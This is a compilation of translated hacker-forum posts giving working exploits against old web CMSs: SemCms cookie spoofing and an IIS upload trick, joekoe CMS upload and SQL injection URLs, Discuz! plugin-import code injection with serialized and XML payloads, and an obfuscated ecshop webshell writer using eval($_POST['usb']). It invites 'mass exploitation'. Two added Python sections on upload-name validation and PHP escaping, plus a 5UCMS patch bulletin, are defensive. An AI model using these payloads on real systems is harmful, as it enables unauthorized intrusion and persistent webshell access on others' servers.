SemCms backend cookie spoofing vulnerability
Google dork: inurl:P_view asp?pid=
Vulnerable file: Clkj_Inc\WebOut.asp
Date found: 2011/03/26
Cookies to use: username=uname=admin;userpas=upas=admin;
Open the 啊D (Ah-D) injection tool or any other tool that can edit cookies, set the cookies above, then log into the backend at Clkj_Admin/nimda_admin.asp. Under advertisement management, upload an image; there is a custom image-name feature. Enter st999.asp;. and upload, then right-click to view the page source and you have the shell address.
Source of the vulnerable file:
WebOut.asp
<%
if trim(request.cookies("username")("uname"))<>"" then
    session("username")=request.cookies("username")("uname")
    session("userpas")=request.cookies("userpas")("upas")
else if trim(session("username"))="" or trim(session("userpas"))="" then
    Response.Write "<script language='javascript'>alert('用户名与密码为空请重新进入!');top.location.href='index.html';</script>"
end if
end if
%>
<script src="http://www.sem-cms.com/huidiao.asp?url=<%=Request.ServerVariables("SERVER_NAME")%>"></script>
Having read the source, everyone gets it: the backend session is filled straight from two client-supplied cookies, so no password check ever runs.
Those who like mass exploitation, go for it...
I tried it; it seems to hit all the older versions too...
Two vulnerabilities in joekoe CMS 4.0
So I looked this one up on the side as well, read 牛牛's analysis, and understood what it meant,
so I am posting it here too,
to show everyone this belated vulnerability.
----------------------------------------------
Two high-risk vulnerabilities in 乔客 (joekoe) CMS 4.0
A while ago I read through joekoe and found two high-risk vulnerabilities in version 4.0: an upload vulnerability that lets any file be uploaded at will, including ASP, and a SQL injection that even returns error messages. Scary.
Upload vulnerability:
Look at the code in \common\include\web.upload.asp
----------------------------------------------------------------------
sub doPageLoad()
    if APP_STATUS="close" then
        treeData.addItem "_status","error.message"
        treeData.addItem "_message","网站暂时因关闭维护中!请稍候..."
        exit sub
    end if
    up.doInit()
    if not upConfig.isInit then
        treeData.addItem "_status","error.message"
        treeData.addItem "_message","上传文件的参数不正确!"
    else
        doPageLoadUser()
        select case upConfig.channel
            case "forum"
                upConfig.setSaveDir(upConfig.getSaveDir&(left(ops.time.toConvertString("",10),6)&DIR_SEPARATOR))
                upConfig.filename=""
            case "user.face"
                upConfig.filename="face_"&upConfig.userid
                upConfig.setSaveDir("face"&DIR_SEPARATOR)
                upConfig.filetype="gif"
            case "blog.logo"
                upConfig.setSaveDir("blog"&DIR_SEPARATOR)
                upConfig.filetype="gif"
            case else
                if instr(upConfig.channel,".")>0 then
                    upConfig.setSaveDir(mid(upConfig.channel,1,instr(upConfig.channel,".")-1)&DIR_SEPARATOR)
                end if
                if instr(upConfig.fileinput,"url")>0 then
                    upConfig.filetype="affix"
                end if
        end select
        if len(upConfig.getSaveDir())<3 then
            treeData.addItem "_status","error.message"
            treeData.addItem "_message","上传文件的参数不正确!"
            exit sub
        end if
        if 1=1 then
            upConfig.setData "zoom.channel.width",120
            upConfig.setData "zoom.channel.height",90
        end if
        upConfig.setBaseDir(DIR_ROOT&DIR_UPLOAD)
        upConfig.setBasePath(opsDirPath(DIR_ROOT&DIR_UPLOAD))
        upConfig.setBaseURL(URL_UPLOAD)
        up.doLoad()
    end if
end sub
----------------------------------------------------------------------
This code uses channel to decide whether the upload type gets assigned. When channel is not forum, user.face or blog.logo, it only checks whether fileinput contains url; if it does not, upConfig.filetype is never assigned. Keep reading:
----------------------------------------------------------------------
if up.isPost() then
    call doParseUploadData()
    treeData.addItem "_status","succeed"
    dim tmpFormMode,tmpFileValue,tmpThumbValue
    tmpFormMode="set"
    if upConfig.channel="user.face" then
        tmpLinkMode="no"
        tmpFileValue="#"&up.getFileInfo("filename")
    else
        tmpFileValue=up.getFileInfo("file.path")
        select case upConfig.filetype
            case "file"
                tmpLinkMode="no"
                'tmpFileValue=up.getFileInfo("file.path")
            case "pic","spic","pics","affix","gif","jpg","jpeg","bmp","png"
                tmpLinkMode="no"
                tmpThumbValue=up.getFileInfo("thumb.path")
            case else
                tmpLinkMode="again"
                tmpFormMode="append"
                dim tmpFileType:tmpFileType=lcase(up.getFileInfo("filetype"))
                select case tmpFileType
                    case "gif","jpg","jpeg","bmp","png"
                        tmpFileValue=""
                    case "swf"
                        tmpFileValue=""
                    case else
                        tmpFileValue="[download="&tmpFileType&"]upload_download.asp?id="&upConfig.fileid&"[/download]"
                end select
        end select
    end if
    treeData.addItem "_form.mode",tmpFormMode
    treeData.addItem "_form.filevalue",tmpFileValue
    treeData.addItem "_form.thumbvalue",tmpThumbValue
end if
----------------------------------------------------------------------
This code switches on upConfig.filetype and then decides the uploaded file's extension. As long as upConfig.filetype was not assigned earlier, and the type is not gif, jpg, jpeg, bmp, png or swf, it lands on tmpFileValue="[download="&tmpFileType&"]upload_download.asp?id="&upConfig.fileid&"[/download]". Everyone's eyes light up at that: the upload type is decided by what the user declares, which is like asking a would-be thief "are you a thief?". This code is just too XX; I suspect plenty of people had already found it and simply not published it.
SQL injection vulnerability
Still in web.upload.asp:
----------------------------------------------------------------------
...
sub doParseUploadData()
    dim tmpFilePath,tmpFileType,tmpFileSize,tmpName
    tmpFilePath=up.getFileInfo("file.path")
    tmpFileType=up.getFileInfo("filetype")
    tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))
    tmpName=up.getFileInfo("name")
    dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID
    tmpChannel=upConfig.channel
    tmpDataid=0
    tmpType=0
    select case upConfig.channel
        case "user.face"
            tmpDataid=upConfig.userid
            tmpChannel="face"
            tmpType=1
            tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&tmpChannel&"' and iid="&tmpDataid&""
        case "blog.logo"
            tmpDataid=toInt(ops.client.getSession("user.blogid"))
            if tmpDataid<1 then tmpDataid=upConfig.userid
            tmpChannel="blog"
            tmptype=1
            tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&tmpChannel&"' and iid="&tmpDataid&""
        case else
            tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&tmpFilePath&"'"
    end select
...
----------------------------------------------------------------------
Look at tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&tmpFilePath&"'": u_url comes from tmpFilePath, and tmpFilePath comes from up.getFileInfo("file.path"). Heh, it goes straight into the SQL query without any filtering.
Exploitation:
1. Upload vulnerability: easy to exploit. Change the channel variable to anything other than forum, user.face or blog.logo, set filetype to asa, and a trojan can be uploaded in broad daylight. A concrete URL looks like common/upload.asp?channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=, then upload.
2. SQL injection vulnerability: put a statement into the channel variable, for example common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=, then upload and it errors out:
----------------------------------------------------------------------
Joekoe CMS 4.0
错误信息:
select top 1 u_id from db_sys_upload where
u_url='user'/20070722031234c.gif'
原始错误:
Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB
Provider for SQL Server
返回首页
Processed in 0.188 s, 1 queries, 54 Cache.
*-------------------------
I tried it myself... the upload works without any problem...
The SQL part afterwards... seems to be useless by now!! Try it yourselves!
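Both the SemCms and joekoe write-ups above succeed because the server lets the client pick the stored file name or its extension: SemCms accepts a custom image name containing .asp;. (IIS 6 executes such a name as ASP regardless of what follows the semicolon), and joekoe takes the extension from the filetype request parameter. The Python below is an added example of the validation a defender wants at that boundary; it is not code from either product, and the extension allowlist, the forbidden-character set and the random stored name are my own choices.

```python
"""Validating an uploaded file's name on the server (added example; not
SemCms or joekoe code).

Both write-ups above work because the client chooses the stored name or
extension. The rule here is the opposite: a short allowlist of image
extensions, exactly one extension per name, no semicolons, NULs or path
separators anywhere, and a server-generated stored name so the client's
string never reaches the filesystem at all.
"""
import re
import secrets

# Extensions this image-upload endpoint accepts (assumed policy). Anything
# else, including .asp, .asa, .cer, .php and .swf, is refused.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png", "bmp"}

# Characters that never belong in a stored name: ';' (IIS 6 runs "x.asp;.jpg"
# as ASP), NUL and other control characters (they truncate the name in C
# code), path separators and the usual Windows-reserved set.
_FORBIDDEN = re.compile(r'[;\x00-\x1f\x7f/\\:<>"|?*]')


def validate_upload_name(client_name: str) -> str:
    """Return the canonical extension of an acceptable name; raise ValueError otherwise."""
    if not client_name or len(client_name) > 255:
        raise ValueError("empty or over-long file name")
    if _FORBIDDEN.search(client_name):
        raise ValueError("forbidden character in file name")
    parts = client_name.lower().split(".")
    # Exactly <stem>.<ext>: "a.asp.jpg", ".jpg", "a." and "noext" all fail.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        raise ValueError("file name must be <name>.<ext> with a single extension")
    ext = parts[1]
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension .{ext} is not allowed")
    return "jpg" if ext == "jpeg" else ext


def stored_name(client_name: str) -> str:
    """Name actually written to disk: a random token plus the validated
    extension. The extension is derived from the validated name, never from
    a separate request parameter such as joekoe's filetype."""
    return f"{secrets.token_hex(16)}.{validate_upload_name(client_name)}"


def is_acceptable(client_name: str) -> bool:
    """Convenience wrapper for callers that only need a yes/no answer."""
    try:
        validate_upload_name(client_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ("photo.jpg", "st999.asp;.jpg", "shell.asa", "a.asp.jpg"):
        print(f"{name!r:20} -> {'accept' if is_acceptable(name) else 'reject'}")
```

The name check is only half of an upload control: the stored directory should also be served without script execution, and the file's content should be checked against its claimed type (magic bytes), which this example does not do.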
How to get a webshell from the Discuz! backend
I. Discuz! 6.0 and Discuz! 7.0
Since we want a shell from the backend, the file-writing code is a must-read.
/include/cache.func.php
Scroll up and find where the function is called; it is all in the updatecache function.
If we can control $plugin['identifier'] we have a chance; it is read from the plugins table.
if(!$cachename || $cachename == 'plugins') {
	$query = $db->query("SELECT pluginid, available, adminid, name, identifier, datatables, directory, copyright, modules FROM {$tablepre}plugins");
	while($plugin = $db->fetch_array($query)) {
		$data = array_merge($plugin, array('modules' => array()), array('vars' => array()));
		$plugin['modules'] = unserialize($plugin['modules']);
		if(is_array($plugin['modules'])) {
			foreach($plugin['modules'] as $module) {
				$data['modules'][$module['name']] = $module;
			}
		}
		$queryvars = $db->query("SELECT variable, value FROM {$tablepre}pluginvars WHERE pluginid='$plugin[pluginid]'");
		while($var = $db->fetch_array($queryvars)) {
			$data['vars'][$var['variable']] = $var['value'];
		}
		// note this line
		writetocache($plugin['identifier'], '', "\$_DPLUGIN['$plugin[identifier]'] = ".arrayeval($data), 'plugin_');
	}
}
Go and look in the backend: identifier is the plugin's unique identifier. Think of second-order injection: a single quote read back from the database is not escaped when it is written to the file. Snicker.
But... you know how it is, like going to the jungle to gank the enemy carry and finding four of them camping there.
/admin/plugins.inc.php
Luckily Discuz! provides an import feature. It is like having stealth when the enemy has no detection, or Wind Walk when they have no stun; at least it leaves us a way out.
if(($newname = trim($newname)) || ($newidentifier = trim($newidentifier))) {
	if(!$newname) {
		cpmsg('plugins_edit_name_invalid');
	}
	$query = $db->query("SELECT pluginid FROM {$tablepre}plugins WHERE identifier='$newidentifier' LIMIT 1");
	// this next one is painful: ispluginkey() checks newidentifier for special characters
	if($db->num_rows($query) || !$newidentifier || !ispluginkey($newidentifier)) {
		cpmsg('plugins_edit_identifier_invalid');
	}
	$db->query("INSERT INTO {$tablepre}plugins (name, identifier, available) VALUES ('".dhtmlspecialchars(trim($newname))."', '$newidentifier', '0')");
}
// write the cache file
updatecache('plugins');
updatecache('settings');
cpmsg('plugins_edit_succeed', 'admincp.php?action=pluginsconfig');
Create any plugin with identifier shell, note the generated file path and contents, then export it for later use.
elseif(submitcheck('importsubmit')) {

	$plugindata = preg_replace("/(#.*\s+)*/", '', $plugindata);
	$pluginarray = daddslashes(unserialize(base64_decode($plugindata)), 1);
	// no validation after decoding
	if(!is_array($pluginarray) || !is_array($pluginarray['plugin'])) {
		cpmsg('plugins_import_data_invalid');
	} elseif(empty($ignoreversion) && strip_tags($pluginarray['version']) != strip_tags($version)) {
		cpmsg('plugins_import_version_invalid');
	}

	$query = $db->query("SELECT pluginid FROM {$tablepre}plugins WHERE identifier='{$pluginarray[plugin][identifier]}' LIMIT 1");
	// only checks for duplicates, then straight into the database
	if($db->num_rows($query)) {
		cpmsg('plugins_import_identifier_duplicated');
	}

	$sql1 = $sql2 = $comma = '';
	foreach($pluginarray['plugin'] as $key => $val) {
		if($key == 'directory') {
			//compatible for old versions
			$val .= (!empty($val) && substr($val, -1) != '/') ? '/' : '';
		}
		$sql1 .= $comma.$key;
		$sql2 .= $comma.'\''.$val.'\'';
		$comma = ',';
	}
	$db->query("INSERT INTO {$tablepre}plugins ($sql1) VALUES ($sql2)");
	$pluginid = $db->insert_id();

	foreach(array('hooks', 'vars') as $pluginconfig) {
		if(is_array($pluginarray[$pluginconfig])) {
			foreach($pluginarray[$pluginconfig] as $config) {
				$sql1 = 'pluginid';
				$sql2 = '\''.$pluginid.'\'';
				foreach($config as $key => $val) {
					$sql1 .= ','.$key;
					$sql2 .= ',\''.$val.'\'';
				}
				$db->query("INSERT INTO {$tablepre}plugin$pluginconfig ($sql1) VALUES ($sql2)");
			}
		}
	}

	updatecache('plugins');
	updatecache('settings');
	cpmsg('plugins_import_succeed', 'admincp.php?action=pluginsconfig');

}
/forumdata/cache/plugin_shell.php
We can feed in arbitrary data; the only thing to watch is that the file name is legal. Thanks to Microsoft, the file name below is legal.
<?php
//Discuz! cache file, DO NOT modify me!
//Created: Mar 17, 2011, 16:56
//Identify: 7c0b5adeadf5a806292d45c64bd0659c

$_DPLUGIN['shell'] = array(
	'pluginid' => '11',
	'available' => '0',
	'adminid' => '0',
	'name' => 'Getshell',
	'identifier' => 'shell',
	'datatables' => '',
	'directory' => '',
	'copyright' => '',
	'modules' =>
	array(
	),
	'vars' =>
	array(
	),
)?>
/forumdata/cache/plugin_a']=phpinfo();$a['a.php
Finally, encode it once and turn it into an exploit:
<?php
//Discuz! cache file, DO NOT modify me!
//Created: Mar 17, 2011, 16:56
//Identify: 7c0b5adeadf5a806292d45c64bd0659c

$_DPLUGIN['a']=phpinfo();$a['a'] = array(
	'pluginid' => '11',
	'available' => '0',
	'adminid' => '0',
	'name' => 'Getshell',
	'identifier' => 'shell',
	'datatables' => '',
	'directory' => '',
	'copyright' => '',
	'modules' =>
	array(
	),
	'vars' =>
	array(
	),
)?>
<?php
$a = unserialize(base64_decode("YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIw
IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldHNo
ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjU6IlNoZWxsIjtzOjExOiJkZXNj
cmlwdGlvbiI7czowOiIiO3M6MTA6ImRhdGF0YWJsZXMiO3M6MDoiIjtzOjk6
ImRpcmVjdG9yeSI7czowOiIiO3M6OToiY29weXJpZ2h0IjtzOjA6IiI7czo3
OiJtb2R1bGVzIjtzOjA6IiI7fXM6NzoidmVyc2lvbiI7czo1OiI2LjAuMCI7
fQ=="));
//print_r($a);
$a['plugin']['name'] = 'GetShell';
$a['plugin']['identifier'] = 'a\']=phpinfo();$a[\'';

print(base64_encode(serialize($a)));
?>
7.0 works the same way; test it yourselves. If you use the code above, tick "允许导入不同版本 Discuz! 的插件" (allow importing plugins from other Discuz! versions).
II. Discuz! 7.2 and Discuz! X1.5
7.2 is used as the example below.
/admin/plugins.inc.php
First look at the import process. From 7.2 on, imported data is XML, but 7.2 keeps backward compatibility with the old format; X1.5 drops it.
Once identifier is validated, the pre-7.0 vulnerability is gone. But then they added language packs...
We only need to control scriptlangstr, or any one of the others.
The key is not universal here between the two versions.
(The daddslashes() implementations of 7.2 and of X1.5 are both listed below, in that order.)
Still, look at the file format of shell.lang.php.
7.2 does not filter the key, so a \ can be used directly to kill the single quote.
In X1.5 a single quote is first escaped to \', and then ' is replaced once more, which still leaves the \.
$v is filtered the same way in both versions, so it is fairly universal.
In X1.5 at least a deputy administrator can manage the backend; although the plugin option is not shown, /admin.php?frames=yes&action=plugins can be accessed directly to add a plugin.
The three XML documents at the end of this section are, in order: the universal $v exploit, the 7.2 key exploit, and the X1.5 exploit.
elseif($operation == 'import') {

	if(!submitcheck('importsubmit') && !isset($dir)) {

		/* form display before submission */

	} else {

		if(!isset($dir)) {
			// decode the imported data
			$pluginarray = getimportdata('Discuz! Plugin');
		} elseif(!isset($installtype)) {
			/* part omitted */
		}
		// checked twice, seriously, twice
		if(!ispluginkey($pluginarray['plugin']['identifier'])) {
			cpmsg('plugins_edit_identifier_invalid', '', 'error');
		}
		if(!ispluginkey($pluginarray['plugin']['identifier'])) {
			cpmsg('plugins_edit_identifier_invalid', '', 'error');
		}
		if(is_array($pluginarray['hooks'])) {
			foreach($pluginarray['hooks'] as $config) {
				if(!ispluginkey($config['title'])) {
					cpmsg('plugins_import_hooks_title_invalid', '', 'error');
				}
			}
		}
		if(is_array($pluginarray['vars'])) {
			foreach($pluginarray['vars'] as $config) {
				if(!ispluginkey($config['variable'])) {
					cpmsg('plugins_import_var_invalid', '', 'error');
				}
			}
		}

		$langexists = FALSE;
		// you have your clever plan, I have my ladder over the wall
		if(!empty($pluginarray['language'])) {
			@mkdir('./forumdata/plugins/', 0777);
			$file = DISCUZ_ROOT.'./forumdata/plugins/'.$pluginarray['plugin']['identifier'].'.lang.php';
			if($fp = @fopen($file, 'wb')) {
				$scriptlangstr = !empty($pluginarray['language']['scriptlang']) ? "\$scriptlang['".$pluginarray['plugin']['identifier']."'] = ".langeval($pluginarray['language']['scriptlang']) : '';
				$templatelangstr = !empty($pluginarray['language']['templatelang']) ? "\$templatelang['".$pluginarray['plugin']['identifier']."'] = ".langeval($pluginarray['language']['templatelang']) : '';
				$installlangstr = !empty($pluginarray['language']['installlang']) ? "\$installlang['".$pluginarray['plugin']['identifier']."'] = ".langeval($pluginarray['language']['installlang']) : '';
				fwrite($fp, "<?php\n".$scriptlangstr.$templatelangstr.$installlangstr.'?>');
				fclose($fp);
			}
			$langexists = TRUE;
		}

		/* processing and so on */
		updatecache('plugins');
		updatecache('settings');
		updatemenu();

		/* some code omitted */

	}
function getimportdata($name = '', $addslashes = 1, $ignoreerror = 0) {
	if($GLOBALS['importtype'] == 'file') {
		$data = @implode('', file($_FILES['importfile']['tmp_name']));
		@unlink($_FILES['importfile']['tmp_name']);
	} else {
		$data = $_POST['importtxt'] && MAGIC_QUOTES_GPC ? stripslashes($_POST['importtxt']) : $GLOBALS['importtxt'];
	}
	include_once DISCUZ_ROOT.'./include/xml.class.php';
	$xmldata = xml2array($data);
	if(!is_array($xmldata) || !$xmldata) {
		// backward compatibility
		if($name && !strexists($data, '# '.$name)) {
			if(!$ignoreerror) {
				cpmsg('import_data_typeinvalid', '', 'error');
			} else {
				return array();
			}
		}
		$data = preg_replace("/(#.*\s+)*/", '', $data);
		$data = unserialize(base64_decode($data));
		if(!is_array($data) || !$data) {
			if(!$ignoreerror) {
				cpmsg('import_data_invalid', '', 'error');
			} else {
				return array();
			}
		}
	} else {
		// XML parsing
		if($name && $name != $xmldata['Title']) {
			if(!$ignoreerror) {
				cpmsg('import_data_typeinvalid', '', 'error');
			} else {
				return array();
			}
		}
		$data = exportarray($xmldata['Data'], 0);
	}
	if($addslashes) {
		// the different daddslashes() handling in the two versions is why the exploit is not universal
		$data = daddslashes($data, 1);
	}
	return $data;
}
function langeval($array) {
	$return = '';
	foreach($array as $k => $v) {
		// single quotes are stripped from the key, but only single quotes, so a \ can neutralise the quote that follows
		$k = str_replace("'", '', $k);
		// you will never make sense of the next line; what does it even want? in love with \?
		$return .= "\t'$k' => '".str_replace(array("\\'", "'"), array("\\\'", "\'"), stripslashes($v))."',\n";
	}
	return "array(\n$return);\n\n";
}
// Discuz! 7.2
function daddslashes($string, $force = 0) {
	!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
	if(!MAGIC_QUOTES_GPC || $force) {
		if(is_array($string)) {
			foreach($string as $key => $val) {
				$string[$key] = daddslashes($val, $force);
			}
		} else {
			$string = addslashes($string);
		}
	}
	return $string;
}
// Discuz! X1.5
function daddslashes($string, $force = 1) {
	if(is_array($string)) {
		foreach($string as $key => $val) {
			unset($string[$key]);
			// the key is filtered too
			$string[addslashes($key)] = daddslashes($val, $force);
		}
	} else {
		$string = addslashes($string);
	}
	return $string;
}
<?php
$scriptlang['shell'] = array(
	'a' => '1',
	'b' => '2',
);

?>
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
  <item id="Title"><![CDATA[Discuz! Plugin]]></item>
  <item id="Version"><![CDATA[7.2]]></item>
  <item id="Time"><![CDATA[2011-03-16 15:57]]></item>
  <item id="From"><![CDATA[Discuz! Board (http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item>
  <item id="Data">
    <item id="plugin">
      <item id="available"><![CDATA[0]]></item>
      <item id="adminid"><![CDATA[0]]></item>
      <item id="name"><![CDATA[www]]></item>
      <item id="identifier"><![CDATA[shell]]></item>
      <item id="description"><![CDATA[]]></item>
      <item id="datatables"><![CDATA[]]></item>
      <item id="directory"><![CDATA[]]></item>
      <item id="copyright"><![CDATA[]]></item>
      <item id="modules"><![CDATA[a:0:{}]]></item>
      <item id="version"><![CDATA[]]></item>
    </item>
    <item id="version"><![CDATA[7.2]]></item>
    <item id="language">
      <item id="scriptlang">
        <item id="a"><![CDATA[b\]]></item>
        <item id=");phpinfo();?>"><![CDATA[x]]></item>
      </item>
    </item>
  </item>
</root>
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
  <item id="Title"><![CDATA[Discuz! Plugin]]></item>
  <item id="Version"><![CDATA[7.2]]></item>
  <item id="Time"><![CDATA[2011-03-16 15:57]]></item>
  <item id="From"><![CDATA[Discuz! Board (http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item>
  <item id="Data">
    <item id="plugin">
      <item id="available"><![CDATA[0]]></item>
      <item id="adminid"><![CDATA[0]]></item>
      <item id="name"><![CDATA[www]]></item>
      <item id="identifier"><![CDATA[shell]]></item>
      <item id="description"><![CDATA[]]></item>
      <item id="datatables"><![CDATA[]]></item>
      <item id="directory"><![CDATA[]]></item>
      <item id="copyright"><![CDATA[]]></item>
      <item id="modules"><![CDATA[a:0:{}]]></item>
      <item id="version"><![CDATA[]]></item>
    </item>
    <item id="version"><![CDATA[7.2]]></item>
    <item id="language">
      <item id="scriptlang">
        <item id="a\"><![CDATA[=>1);phpinfo();?>]]></item>
      </item>
    </item>
  </item>
</root>
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
  <item id="Title"><![CDATA[Discuz! Plugin]]></item>
  <item id="Version"><![CDATA[7.2]]></item>
  <item id="Time"><![CDATA[2011-03-16 15:57]]></item>
  <item id="From"><![CDATA[Discuz! Board (http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item>
  <item id="Data">
    <item id="plugin">
      <item id="available"><![CDATA[0]]></item>
      <item id="adminid"><![CDATA[0]]></item>
      <item id="name"><![CDATA[www]]></item>
      <item id="identifier"><![CDATA[shell]]></item>
      <item id="description"><![CDATA[]]></item>
      <item id="datatables"><![CDATA[]]></item>
      <item id="directory"><![CDATA[]]></item>
      <item id="copyright"><![CDATA[]]></item>
      <item id="modules"><![CDATA[a:0:{}]]></item>
      <item id="version"><![CDATA[]]></item>
    </item>
    <item id="version"><![CDATA[7.2]]></item>
    <item id="language">
      <item id="scriptlang">
        <item id="a'"><![CDATA[=>1);phpinfo();?>]]></item>
      </item>
    </item>
  </item>
</root>
If you like, you can also try the base64_encode(serialize($a)) method for getting a webshell on 7.2.
http://www.t00ls.net/thread-15464-1-1.html
function writetocache($script, $cachenames, $cachedata = '', $prefix = 'cache_') {
	global $authkey;
	if(is_array($cachenames) && !$cachedata) {
		foreach($cachenames as $name) {
			$cachedata .= getcachearray($name, $script);
		}
	}

	$dir = DISCUZ_ROOT.'./forumdata/cache/';
	if(!is_dir($dir)) {
		@mkdir($dir, 0777);
	}
	if($fp = @fopen("$dir$prefix$script.php", 'wb')) {
		fwrite($fp, "<?php\n//Discuz! cache file, DO NOT modify me!".
			"\n//Created: ".date("M j, Y, G:i").
			"\n//Identify: ".md5($prefix.$script.'.php'.$cachedata.$authkey)."\n\n$cachedata?>");
		fclose($fp);
	} else {
		exit('Can not write to cache files, please check directory ./forumdata/ and ./forumdata/cache/ .');
	}
}
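Every Discuz! bug in this section, the 7.0 plugin cache and the 7.2/X1.5 language file alike, is the same defect: a string the importer controls is written into PHP source with incomplete escaping. The identifier goes into $_DPLUGIN['...'] verbatim, and langeval() strips single quotes from the key but leaves backslashes, so a trailing backslash escapes the closing quote; the value side has the same gap. The Python below is an added example, not Discuz! code: it shows the correct two-character escape for a PHP single-quoted literal, an ispluginkey()-style allowlist (the real pattern is not on the page, so mine is an assumption), and a small decoder that mimics how the PHP parser finds the end of a literal, which makes it possible to see exactly where each generated line really ends. langeval_entry_unsafe() reconstructs the 7.2 behaviour from the excerpt above purely for comparison.

```python
"""Emitting PHP source from untrusted data (added example; not Discuz! code).

Inside a PHP single-quoted literal exactly two characters need escaping,
backslash and single quote, and backslash must be handled first. Anything
less lets the data end the literal early and run as code.
"""
import re

# Allowlist in the spirit of Discuz!'s ispluginkey(); the real pattern is not
# on the page, so this one is an assumption: word characters only.
_PLUGIN_KEY = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,39}$")


def is_plugin_key(value: str) -> bool:
    """Reject any identifier that is not a plain word."""
    return bool(_PLUGIN_KEY.match(value))


def php_single_quoted(value: str) -> str:
    """Correct rendering of value as a PHP single-quoted literal."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def langeval_entry_unsafe(key: str, value: str) -> str:
    r"""Reconstruction of what Discuz! 7.2 langeval() emits (from the page):
    quotes are stripped from the key, "\'" -> "\\'" and then "'" -> "\'" in
    the value, and a lone backslash survives on both sides."""
    k = key.replace("'", "")
    v = value.replace("\\'", "\\\\'").replace("'", "\\'")
    return f"\t'{k}' => '{v}',\n"


def langeval_entry_safe(key: str, value: str) -> str:
    """The same line with both sides escaped properly."""
    return f"\t{php_single_quoted(key)} => {php_single_quoted(value)},\n"


def render_plugin_cache(identifier: str, data: dict) -> str:
    """$_DPLUGIN[...] assignment for the plugin cache: refuses identifiers
    that fail the allowlist and escapes every key and value."""
    if not is_plugin_key(identifier):
        raise ValueError(f"invalid plugin identifier: {identifier!r}")
    body = "".join(langeval_entry_safe(k, str(v)) for k, v in data.items())
    return f"<?php\n$_DPLUGIN[{php_single_quoted(identifier)}] = array(\n{body});\n"


def first_literal(src: str, start: int = 0):
    """Decode the single-quoted literal opening at src[start] the way the PHP
    parser does and return (decoded_text, index_of_closing_quote). This is
    the check that shows where a generated line really ends."""
    assert src[start] == "'"
    out, i = [], start + 1
    while i < len(src):
        ch = src[i]
        if ch == "\\" and i + 1 < len(src) and src[i + 1] in "\\'":
            out.append(src[i + 1])
            i += 2
        elif ch == "'":
            return "".join(out), i
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated literal: the closing quote was escaped away")


def value_closes_cleanly(entry: str) -> bool:
    """True if the value literal of a generated entry ends right before ',\\n'."""
    start = entry.index("=> '") + 3
    try:
        _, end = first_literal(entry, start)
    except ValueError:
        return False
    return entry[end + 1:] == ",\n"


if __name__ == "__main__":
    # Value ending in a backslash: the 7.2 line never closes its literal,
    # the escaped line does.
    print(value_closes_cleanly(langeval_entry_unsafe("a", "b\\")))  # False
    print(value_closes_cleanly(langeval_entry_safe("a", "b\\")))    # True
    # Key ending in a backslash: in 7.2 the key literal swallows " => ".
    print(first_literal(langeval_entry_unsafe("a\\", "x"), 1))
    print(first_literal(langeval_entry_safe("a\\", "x"), 1))
```

The escaping function is the important part; the allowlist is a second, independent layer, because the identifier is also used as a file name and as an array key, and neither of those is a string literal.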
ecshop backend shell, newest method: works on the latest version and from a low-privilege backend account
1. Backend - order management - order print - choose source-code editing - save
Go back to the order list, pick any order and print it; it returns OK and the one-liner has been written.
2. Write the converted code into the order print template (source-code mode; remember to add the closing tags on both sides):
3. Connect to the file:
http://localhost/null.php
The lazy can use the code below; the file to connect to is null.php in the web root, and the password is usb:
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
$fp=@fopen($filen,$a);
$msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
?>
5UCMS vulnerability bulletin
Vulnerability report: http://www.wooyun.org/bugs/wooyun-2010-01515
Description: no check for whether the user is logged in [important]; ecid and cid are not filtered
Countermeasures:
Open admin/ajax.asp
Find Dim ID,Key,Rs,i and add Call ChkLogin("login") on the line above it
Find set rs=db("select [modeext] from [{pre}channel] where id=" & ecid,1) and change it to set rs=db("select [modeext] from [{pre}channel] where id=" & clng(ecid),1)
Find set es=db("select [modeindex] from [{pre}content] where id=" & eid,1) and change it to set es=db("select [modeindex] from [{pre}content] where id=" & clng(eid),1)
Vulnerability report: http://www.wooyun.org/bugs/wooyun-2010-01513
Description: HTTP_REFERER forgery
Countermeasures:
Open in/function.asp
Find if len(Msgstr) > 0 then response.write "<Script>alert('" & Msgstr & "');</Script>" and add response.end on the line below it
Vulnerability report (not valid): http://www.wooyun.org/bugs/wooyun-2010-01543
Description (not valid): ID is already filtered, so this vulnerability does not hold; no need to worry
Security recommendation:
Open plus/count/js.asp
